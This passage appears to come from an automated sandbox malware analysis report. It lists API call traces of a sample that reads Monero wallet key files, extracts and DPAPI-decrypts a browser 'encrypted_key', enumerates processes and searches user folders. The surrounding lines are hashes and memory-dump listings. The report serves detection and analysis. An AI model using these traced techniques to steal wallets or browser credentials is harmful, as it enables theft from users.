                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00721678,00720D93), ref: 0070F64C
                                  • lstrlen.KERNEL32(00000000), ref: 0070F66B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: b38166e220be0e237e60d1a123d44eada434307d3182fc3b2f84076d998eed81
                                  • Instruction ID: 3c5e1cc9c1a9e3f7aa7feb107cbec56feef6bb767a06c18a8315f22664aeeb4e
                                  • Opcode Fuzzy Hash: b38166e220be0e237e60d1a123d44eada434307d3182fc3b2f84076d998eed81
                                  • Instruction Fuzzy Hash: 895104B1E11108EBCB14FBA8ED5ADED7379AF54310F408568F416671D1EE386B48CB62
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 6988fb1080872caed33d40db1ae4362969ca64f8f2f3a59e2c712062d251ac5a
                                  • Instruction ID: 56061c686c09649bbce9ea1e0f2a36e5d98e19babda1432575ad1e383598a080
                                  • Opcode Fuzzy Hash: 6988fb1080872caed33d40db1ae4362969ca64f8f2f3a59e2c712062d251ac5a
                                  • Instruction Fuzzy Hash: FA4160B1E15109EFCF04EFA8D955AEEB778AF44314F008018F516762D1EB78AA84CFA1
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0070A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0070A13C
                                    • Part of subcall function 0070A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0070A161
                                    • Part of subcall function 0070A110: LocalAlloc.KERNEL32(00000040,?), ref: 0070A181
                                    • Part of subcall function 0070A110: ReadFile.KERNEL32(000000FF,?,00000000,0070148F,00000000), ref: 0070A1AA
                                    • Part of subcall function 0070A110: LocalFree.KERNEL32(0070148F), ref: 0070A1E0
                                    • Part of subcall function 0070A110: CloseHandle.KERNEL32(000000FF), ref: 0070A1EA
                                    • Part of subcall function 00718FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00718FE2
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0070A489
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A23F
                                    • Part of subcall function 0070A210: LocalAlloc.KERNEL32(00000040,?,?,?,00704F3E,00000000,?), ref: 0070A251
                                    • Part of subcall function 0070A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Op,00000000,00000000), ref: 0070A27A
                                    • Part of subcall function 0070A210: LocalFree.KERNEL32(?,?,?,?,00704F3E,00000000,?), ref: 0070A28F
                                    • Part of subcall function 0070A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0070A2D4
                                    • Part of subcall function 0070A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0070A2F3
                                    • Part of subcall function 0070A2B0: LocalFree.KERNEL32(?), ref: 0070A323
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 40a68d05c377889b61852e4f54d6cf6d1ea35e8d5d29e69d4d8962b22f13aafb
                                  • Instruction ID: e08133967ce863b8c9c559c84c023e770a87e2f7a1ef8d111741f0da4fe62138
                                  • Opcode Fuzzy Hash: 40a68d05c377889b61852e4f54d6cf6d1ea35e8d5d29e69d4d8962b22f13aafb
                                  • Instruction Fuzzy Hash: 573143B6D10209EBCF14DBE4DC45AEFB7B8BF58300F444618E901A7281E7389A55CB62
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,007205BF), ref: 0071885A
                                  • Process32First.KERNEL32(?,00000128), ref: 0071886E
                                  • Process32Next.KERNEL32(?,00000128), ref: 00718883
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • CloseHandle.KERNEL32(?), ref: 007188F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 88e43f6c480a6ba893fc4624d7b35c175ee14427a6e299c079aad85ba8693755
                                  • Instruction ID: ff0397ef0d6896e0640722dfd32ba70dd3930154d4ff4340741afd65fecb9a1f
                                  • Opcode Fuzzy Hash: 88e43f6c480a6ba893fc4624d7b35c175ee14427a6e299c079aad85ba8693755
                                  • Instruction Fuzzy Hash: EA315EB1956258EBCB24DF98DC55FEEB378EB05710F104199F10AA21D0DB386B84CFA1
                                  APIs
                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0077FE13
                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0077FE2C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Value___vcrt_
                                  • String ID:
                                  • API String ID: 1426506684-0
                                  • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction ID: 63f8d36849475f040df69eb7b4cf1e7651f0120d9866542ad6ad1af351154987
                                  • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                  • Instruction Fuzzy Hash: 63018432649721EEFE3427746DC9A6B3698EB017F57348339F22A851F2EF994C429250
                                  APIs
                                  • __getptd.LIBCMT ref: 0071CA7E
                                    • Part of subcall function 0071C2A0: __amsg_exit.LIBCMT ref: 0071C2B0
                                  • __getptd.LIBCMT ref: 0071CA95
                                  • __amsg_exit.LIBCMT ref: 0071CAA3
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0071CAC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 87aaa2411feda0a80b3ebc94571a361ae75b15ba15779029081816f53e11081a
                                  • Instruction ID: a0a01f6fe60cc3d97123277ff50473c4bad04e83b0407fe61399ba354df9d5e4
                                  • Opcode Fuzzy Hash: 87aaa2411feda0a80b3ebc94571a361ae75b15ba15779029081816f53e11081a
                                  • Instruction Fuzzy Hash: 6AF03032984618DBD723FBEC980B7DE33A0AF44B20F15814AF505A61D2DB7C99C19AD6
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Catch
                                  • String ID: MOC$RCC
                                  • API String ID: 78271584-2084237596
                                  • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction ID: fbf9343a4ff95c6c9f3ac0844fe04b2a2a88eaf80755ff549c076a51a256f0dd
                                  • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                  • Instruction Fuzzy Hash: EF415B71940209EFCF15EF94DD81EAE7BB5BF48304F158059F90466211D3399A60DFA0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: T8x
                                  • API String ID: 0-3719633547
                                  • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction ID: 9882366358d0ec0e9f890776ee305aeac71d924365118d07f2fd0518f9b72cd2
                                  • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                  • Instruction Fuzzy Hash: 2F21C3F1680205FFEB10BF79CCC486AB7A9BF007657104619F925C7151E779EE0087A0
                                  APIs
                                    • Part of subcall function 00718F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00718F9B
                                  • lstrcat.KERNEL32(?,00000000), ref: 007151CA
                                  • lstrcat.KERNEL32(?,00721058), ref: 007151E7
                                  • lstrcat.KERNEL32(?,011D90E0), ref: 007151FB
                                  • lstrcat.KERNEL32(?,0072105C), ref: 0071520D
                                    • Part of subcall function 00714B60: wsprintfA.USER32 ref: 00714B7C
                                    • Part of subcall function 00714B60: FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                    • Part of subcall function 00714B60: StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                    • Part of subcall function 00714B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                    • Part of subcall function 00714B60: FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 4c0b1f8f689cae180a48fb92fe8bf086eb9f014df49f4d657dd15bf39cc5cd0e
                                  • Instruction ID: e91ac4cc4f4af648edc4cfcf5aa159de030fc4eaf986b3804c0de2ee4e8a7f97
                                  • Opcode Fuzzy Hash: 4c0b1f8f689cae180a48fb92fe8bf086eb9f014df49f4d657dd15bf39cc5cd0e
                                  • Instruction Fuzzy Hash: DF2148FA948208F7CB24EBB4EC46EED333CAB94300F404545B655560C1EE789AC88BA1